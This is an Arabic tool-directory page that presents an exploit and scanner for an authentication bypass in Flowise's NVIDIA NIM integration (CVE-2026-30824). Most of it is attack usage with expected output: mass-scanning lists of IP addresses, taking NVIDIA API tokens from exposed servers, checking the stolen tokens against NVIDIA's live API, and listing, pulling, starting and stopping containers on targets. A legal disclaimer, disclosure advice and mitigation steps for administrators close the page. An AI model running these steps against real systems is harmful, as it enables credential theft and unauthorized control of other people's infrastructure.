Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication — إثبات مفهوم لاستغلال **CVE-2026-30824**، وهي ثغرة حرجة في تجاوز المصادقة في Flowise تكشف نقاط نهاية NVIDIA NIM API دون مصادقة. | Kitploit
أدوات/GitHubGitHub/dylvie/cve-2026-30824-flowise-nvidia-nim-authentication
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار أمان APIاختبار الاختراق
GitHubdylvie/cve-2026-30824-flowise-nvidia-nim-authentication

CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication

إثبات مفهوم لاستغلال **CVE-2026-30824**، وهي ثغرة حرجة في تجاوز المصادقة في Flowise تكشف نقاط نهاية NVIDIA NIM API دون مصادقة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

CVE-2026-30824 — أداة فحص واستغلال تجاوز المصادقة في Flowise NVIDIA NIM

أداة إثبات مفهوم للفحص والاستغلال لثغرة CVE-2026-30824، وهي ثغرة حرجة في تجاوز المصادقة في Flowise تكشف نقاط نهاية NVIDIA NIM API دون مصادقة.

نظرة عامة على الثغرة

CVE-2026-30824 هي ثغرة حرجة في تجاوز المصادقة في Flowise (< 3.0.13) تسمح للمهاجمين عن بُعد دون مصادقة بالوصول إلى إدارة حاويات NVIDIA NIM ونقاط نهاية توليد رموز API.

الحقلالقيمة
درجة CVSS9.8 (حرجة)
CWECWE-306: غياب المصادقة للوظائف الحرجة
الإصدارات المتأثرةFlowise < 3.0.13
الأثرإدارة كاملة للحاويات، وصول إلى GPU، سرقة الرموز

السبب الجذري

مسار /api/v1/nvidia-nim/* مدرج في القائمة البيضاء في البرمجية الوسيطة العامة للمصادقة، مما يسمح بالوصول دون مصادقة إلى:

  • توليد الرموز وتسريبها
  • إدارة الحاويات (قائمة، تشغيل، إيقاف)
  • سحب صور Docker
  • تكامل NVIDIA API

الميزات

✅ اكتشاف الثغرة — فحص سريع لمعرفة ما إذا كان الهدف معرضًا للخطر
✅ استخراج الرموز — تسريب رموز NVIDIA API من نقاط النهاية المعرضة
✅ التحقق من الرموز — التحقق من الرموز المسربة مقابل NVIDIA API (إظهار نطاق الأثر)
✅ تعداد الحاويات — عرض حاويات NIM قيد التشغيل
✅ الفحص الجماعي — فحص أهداف متعددة من ملف
✅ تجاوز SSL — تجاهل الشهادات ذاتية التوقيع افتراضيًا
✅ مخرجات ملونة — مؤشرات حالة سهلة القراءة (أخضر/أصفر/أحمر)
✅ الاستطلاع — رسم خرائط كامل لنقاط النهاية والتشخيص


التثبيت

المتطلبات الأساسية

  • Python 3.7+
  • مكتبة requests

الإعداد

root@kitploit:~
# استنساخ أو تنزيل السكربت
git clone <repository>
cd cve-2026-30824

# تثبيت التبعيات
pip install -r requirements.txt
# أو
pip install requests

الاستخدام

فحص الثغرة الأساسي

root@kitploit:~
# فحص ما إذا كان هدف واحد معرضًا للخطر
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check

# المخرجات المتوقعة (معرض للخطر):
# [+] الهدف يبدو معرضًا للخطر (HTTP 200)
#     الاستجابة: {...}

فحص أهداف متعددة

root@kitploit:~
# إنشاء targets.txt مع عنوان URL واحد في كل سطر
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF

# فحص جميع الأهداف (وضع سريع، بدون مطالبات)
python3 CVE-2026-30824.py -f targets.txt --scan-only

# ملخص المخرجات المتوقع:
# ============================================================
# [*] ملخص الفحص
# ============================================================
# [+] معرض للخطر: 2
#     ✓ http://192.168.1.100:3000
#     ✓ http://192.168.1.101:3000
# [-] تم التصحيح: 1
#     ✗ http://192.168.1.102:3000

استخراج رمز NVIDIA API

root@kitploit:~
# تسريب رمز NVIDIA API من نقطة النهاية المعرضة
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# المخرجات المتوقعة:
# [*] محاولة تسريب رمز NVIDIA API...
# [+] رمز NVIDIA API: eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] نوع الرمز: Bearer
# [+] تنتهي الصلاحية خلال: 3600 ثانية

التحقق من الرمز مقابل NVIDIA API

root@kitploit:~
# التحقق من أن الرمز المسرب يعمل مقابل NVIDIA API الحقيقي
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."

# المخرجات المتوقعة:
# [*] التحقق من الرمز مقابل NVIDIA API...
# [+] الرمز صالح! الوصول إلى 45 نموذج NVIDIA NIM.
#     - mistralai/mistral-7b-instruct-v0.1
#     - meta-llama/llama2-70b
#     - (...)

عرض الحاويات قيد التشغيل

root@kitploit:~
# تعداد الحاويات على الهدف
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers

# المخرجات المتوقعة:
# [*] عرض الحاويات قيد التشغيل...
# [+] HTTP 200
# [
#   {
#     "id": "abc123xyz",
#     "names": ["flowise_nim"],
#     "image": "nvcr.io/nvidia/nim:latest",
#     "state": "running"
#   }
# ]

استطلاع كامل (جميع الفحوصات)

root@kitploit:~
# تشغيل جميع فحوصات الاستطلاع على الهدف المعرض
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

خيارات سطر الأوامر

root@kitploit:~
usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
                             [--scan-only] [--get-token]
                             [--validate-token TOKEN] [--list-containers]
                             [--get-container CONTAINER_ID]
                             [--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
                             [--start-container IMAGE_TAG]
                             [--container-name CONTAINER_NAME]
                             [--stop-container CONTAINER_ID] [--preload]
                             [--all] [--timeout TIMEOUT] [--debug]

الحجج الاختيارية:
  -h, --help                    عرض رسالة المساعدة والخروج
  -t, --target TARGET           عنوان URL للهدف (مثل: http://192.168.1.100:3000)
  -f, --targets-file FILE       ملف يحتوي على قائمة الأهداف (واحد في كل سطر)
  
اكتشاف الثغرة:
  --check                       فحص ما إذا كان الهدف معرضًا للخطر فقط
  --scan-only                   فحص الأهداف بحثًا عن الثغرة دون مطالبات
  --debug                       عرض تفاصيل الطلب والاستجابات الخام
  
الاستغلال:
  --get-token                   تسريب رمز NVIDIA API
  --validate-token TOKEN        التحقق من الرمز المسرب مقابل NVIDIA API
  --list-containers             عرض حاويات NIM قيد التشغيل
  --get-container CONTAINER_ID  الحصول على تفاصيل الحاوية
  --get-image IMAGE_ID          الحصول على تفاصيل الصورة
  --pull-image IMAGE_TAG        سحب صورة Docker (مثل: nvcr.io/nvidia/nim:latest)
  --start-container IMAGE_TAG   تشغيل حاوية من علامة صورة
  --container-name NAME         اسم الحاوية التي تم تشغيلها
  --stop-container CONTAINER_ID إيقاف حاوية قيد التشغيل
  --preload                     تشغيل نقطة نهاية التحميل المسبق للموارد
  --all                         تشغيل جميع فحوصات الاستطلاع
  
متقدم:
  --timeout SECONDS             مهلة الطلب بالثواني (الافتراضي: 15)

أمثلة على سير العمل

السيناريو 1: تقييم الشبكة الداخلية

root@kitploit:~
# 1. فحص الشبكة الفرعية بالكامل بحثًا عن الحالات المعرضة
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only

# 2. لكل هدف معرض، استخراج الرمز
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 3. التحقق من تأثير الرمز
python3 CVE-2026-30824.py --validate-token "<extracted-token>"

السيناريو 2: إثبات الأثر

root@kitploit:~
# التحقق من الثغرة وإظهار نطاق الأثر الكامل
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

# سيؤدي هذا إلى:
# 1. فحص الثغرة
# 2. استخراج رمز NVIDIA API
# 3. التحقق من الرمز مقابل NVIDIA API
# 4. عرض الحاويات قيد التشغيل
# 5. إظهار تعداد الموارد

السيناريو 3: المراقبة المستمرة

root@kitploit:~
# مراقبة هدف بشكل دوري (عبر cron أو المجدول)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log

مؤشرات المخرجات

الألوان

  • 🟢 أخضر — هدف معرض للخطر أو استغلال ناجح
  • 🟡 أصفر — تم التصحيح/غير معرض أو تحذير
  • 🔴 أحمر — خطأ أو فشل في الاتصال

رموز الحالة

HTTPالمعنى
200✅ معرض للخطر (نقطة النهاية قابلة للوصول)
400✅ معرض للخطر (خطأ في التطبيق لكن نقطة النهاية موجودة)

استكشاف الأخطاء وإصلاحها

"تم استلام استجابة HTML بدلاً من JSON"

المشكلة: تعيد نقطة النهاية صفحة HTML بدلاً من استجابة JSON API.

الحلول:

  1. تحقق من أن إصدار Flowise معرض بالفعل (< 3.0.13)
  2. تحقق من أن الهدف يشغل Flowise فعليًا (وليس تطبيقًا مختلفًا)
  3. تحقق من أن مسار نقطة النهاية لم يتغير في هذا الإصدار
  4. تحقق من وجود بروكسي عكسي أو WAF يتداخل

"تم رفض الاتصال" أو "انتهت المهلة"

المشكلة: لا يمكن الوصول إلى الهدف.

الحلول:

root@kitploit:~
# اختبار الاتصال
curl -v http://192.168.1.100:3000/

# زيادة المهلة
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check --timeout 30

خطأ شهادة SSL

المشكلة: يستخدم الهدف شهادة ذاتية التوقيع أو منتهية الصلاحية.

الحل: يعطل السكربت التحقق من SSL افتراضيًا. إذا استمرت المشكلات:

root@kitploit:~
# إضافة المنفذ والبروتوكول صراحةً
python3 CVE-2026-30824.py -t https://192.168.1.100:3000 --check

فشل التحقق من الرمز

المشكلة: تم استخراج الرمز لكن التحقق مقابل NVIDIA API يفشل.

الأسباب:

  • قد يكون الرمز قد انتهت صلاحيته بالفعل
  • قد يكون الرمز غير صالح (تعيد نقطة النهاية رمزًا مزيفًا)
  • اتصال الشبكة بـ NVIDIA API محظور

اعتبارات أمنية

⚠️ إشعار قانوني

  • هذه الأداة مخصصة لاختبار الأمان المصرح به فقط
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • اختبر الأنظمة التي تملكها فقط أو التي لديك إذن صريح لاختبارها
  • لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام

الإفصاح المسؤول

إذا اكتشفت هذه الثغرة في بيئة حقيقية:

  1. وثّق النتائج
  2. تواصل مع فريق الأمان في المؤسسة
  3. امنح وقتًا معقولًا للمعالجة (عادةً 90 يومًا)
  4. لا تفصح علنًا حتى يتم التصحيح

التخفيف

لمسؤولي الأنظمة

فوري:

  1. ترقية Flowise إلى الإصدار 3.0.13 أو أحدث
  2. تنفيذ ضوابط الوصول إلى الشبكة (قواعد جدار الحماية)
  3. تعطيل تكامل NVIDIA NIM إذا لم يكن مطلوبًا
  4. مراقبة سجلات API بحثًا عن استخدام مشبوه للرموز

طويل الأمد:

  1. استخدام قواعد WAF لحظر مسارات /api/v1/nvidia-nim/*
  2. تنفيذ تحديد معدل API
  3. تفعيل المراقبة والتنبيهات الأمنية
  4. إجراء تقييمات أمنية منتظمة

للمطورين

  • مراجعة جميع تجاوزات المصادقة في قاعدة الكود
  • تنفيذ سياسات وصول ترفض افتراضيًا
  • إضافة اختبارات أمان شاملة لنقاط نهاية API
  • استخدام الفحص الأمني الآلي في CI/CD

المراجع

  • إدخال NVD
  • Flowise GitHub
  • توثيق NVIDIA NIM
  • CWE-306: غياب المصادقة

الترخيص

هذه الأداة مقدمة لأغراض تعليمية واختبار الأمان المصرح به فقط. راجع ملف LICENSE للحصول على التفاصيل.

إخلاء المسؤولية

هذه الأداة مقدمة "كما هي" دون أي ضمان. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.


المؤلف

أُنشئت لاختبار الاختراق المصرح به والبحث الأمني.

آخر تحديث: أبريل 2026

تنزيل الأداة
401🟡 تم التصحيح (المصادقة مطلوبة)
404🟡 ليس Flowise أو نقطة النهاية غير موجودة
5xx🔴 خطأ في الخادم/إعداد خاطئ